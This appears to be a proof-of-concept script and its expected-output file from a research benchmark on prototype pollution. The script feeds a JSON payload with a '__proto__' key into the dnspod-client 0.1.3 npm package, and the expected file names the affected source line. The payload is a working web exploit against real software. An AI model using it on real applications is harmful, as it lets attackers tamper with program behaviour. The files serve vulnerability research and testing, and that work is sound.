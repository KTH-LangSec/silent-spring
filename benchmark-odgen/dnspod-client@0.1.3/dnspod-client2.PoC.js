const Dnspod = require('./dnspod-client@0.1.3')
const payload = JSON.parse('{"__proto__": {"polluted": {"prop": 1}}}');
payload.__proto__.polluted.toString = function() { return "yes"; }
new Dnspod(payload);