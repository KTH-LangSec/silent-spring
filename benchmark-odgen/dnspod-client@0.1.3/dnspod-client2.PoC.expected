dnspod-client@0.1.3/src/dnspod.js:21:17